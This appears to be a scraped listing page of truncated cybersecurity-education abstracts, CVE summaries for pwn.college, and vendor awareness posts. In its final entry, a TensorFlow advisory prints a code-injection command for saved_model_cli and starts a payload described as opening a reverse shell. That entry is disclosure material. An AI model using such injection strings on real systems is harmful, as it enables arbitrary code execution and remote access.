LITE-SOC: Lightweight Security Operations Center Simulator for Cybersecurity Education

This innovative practice WIP paper describes LITE-SOC, a lightweight web-based Security Operations Center SOC simulator designed for instructor-led cybersecurity education. SOC analysts must triage large volumes of alerts, separate genuine threats from false positives, and communicate decisions...

darkmarket-vuln-lab

🕶️ Dark Market Simulator An intentionally vulnerable CTF-...

SentinelSphere: Integrating AI-Powered Real-Time Threat Detection with Cybersecurity Awareness Training

The field of cybersecurity is confronted with two interrelated challenges: a worldwide deficit of qualified practitioners and ongoing human-factor weaknesses that account for the bulk of security incidents. To tackle these issues, we present SentinelSphere, a platform driven by artificial...

AI in Cybersecurity Education -- Scalable Agentic CTF Design Principles and Educational Outcomes

Large language models are rapidly changing how learners acquire and demonstrate cybersecurity skills. However, when human--AI collaboration is allowed, educators still lack validated competition designs and evaluation practices that remain fair and evidence-based. This paper presents a...

Empowering Future Cybersecurity Leaders: Advancing Students through FINDS Education for Digital Forensic Excellence

The Forensics Investigations Network in Digital Sciences FINDS Research Center of Excellence CoE, funded by the U.S. Army Research Laboratory, advances Digital Forensic Engineering Education DFEE through an integrated research education framework for AI enabled cybersecurity workforce development...

Can AI Lower the Barrier to Cybersecurity? A Human-Centered Mixed-Methods Study of Novice CTF Learning

Capture-the-Flag CTF competitions serve as gateways into offensive cybersecurity, yet they often present steep barriers for novices due to complex toolchains and opaque workflows. Recently, agentic AI frameworks for cybersecurity promise to lower these barriers by automating and coordinating...

CTF for Education

In this paper, we take a close look at how CTF can be used in cybersecurity education. We divide the CTF competitions into four different categories, which are attack-based CTFs, defense-based CTFs, jeopardy CTFs and gamified and wargames CTFs. We start our analysis by summarizing the main...

EUVD-2025-3972

Malicious code in bioql PyPI...

Enabling Cyber Security Education through Digital Twins and Generative AI

Digital Twins DTs are gaining prominence in cybersecurity for their ability to replicate complex IT Information Technology, OT Operational Technology, and IoT Internet of Things infrastructures, allowing for real time monitoring, threat analysis, and system simulation. This study investigates how...

A Human Study of Cognitive Biases in Web Application Security

Cybersecurity training has become a crucial part of computer science education and industrial onboarding. Capture the Flag CTF competitions have emerged as a valuable, gamified approach for developing and refining the skills of cybersecurity and software engineering professionals. However, while...

Integrating Graph Theoretical Approaches in Cybersecurity Education CSCI-RTED

As cybersecurity threats continue to evolve, the need for advanced tools to analyze and understand complex cyber environments has become increasingly critical. Graph theory offers a powerful framework for modeling relationships within cyber ecosystems, making it highly applicable to cybersecurity...

A Comprehensive Survey of Cybercrimes in India over the Last Decade

Since the 1990s, the integration of technology into daily life has led to the creation of an extensive network of interconnected devices, transforming how individuals and organizations operate. However, this digital transformation has also spurred the rise of cybercrime, criminal activities...

CVE-2025-24885

pwn.college is an education platform to learn about, and practice, core cybersecurity concepts in a hands-on fashion. Missing access control on rendering custom unprivileged dojo pages causes ability for users to create stored XSS...

CVE-2025-24886

pwn.college is an education platform to learn about, and practice, core cybersecurity concepts in a hands-on fashion. Incorrect symlink checks on user specified dojos allows for users admin not required to perform an LFI from the CTFd container. When a user clones or updates repositories, a check...

CVE-2025-24885

pwn.college is an education platform to learn about, and practice, core cybersecurity concepts in a hands-on fashion. Missing access control on rendering custom unprivileged dojo pages causes ability for users to create stored XSS...

The Future of Cybersecurity

Pioneering the Forward-Thinking Epoch of Internet Safety As we brace for an era anticipated to offer a deeper entwined digital landscape, a profound transformation stirs within the realms of online safety. As we are safeguarding not just personal computers or mobile devices, but also other...

Celebrate 20 years of Cybersecurity Awareness Month with Microsoft and let’s secure our world together

This year marks the twentieth anniversary of Cybersecurity Awareness Month, when we partner with the National Cybersecurity Alliance, the United States Cybersecurity and Infrastructure Security Agency CISA, and organizations around the world to amplify the importance of cybersecurity best practic...

Microsoft at NICE Conference: Resetting expectations and enabling diversity in the cybersecurity workforce

Closing the cybersecurity talent gap is not something we can achieve alone; it requires a collective effort from the entire industry and focus on enabling cybersecurity awareness and education for all. This realization hit home for us during our recent participation in the National Initiative for...

5 Reasons Why Access Management is the Key to Securing the Modern Workplace

The way we work has undergone a dramatic transformation in recent years. We now operate within digital ecosystems, where remote work and the reliance on a multitude of digital tools is the norm rather than the exception. This shift – as you likely know from your own life – has led to superhuman...

Code injection in `saved_model_cli` in TensorFlow

Impact TensorFlow's savedmodelcli tool is vulnerable to a code injection: savedmodelcli run --inputexprs 'x=print"malicious code to run"' --dir ./ --tagset serve --signaturedef servingdefault This can be used to open a reverse shell savedmodelcli run --inputexprs 'hello=exec"""\nimport...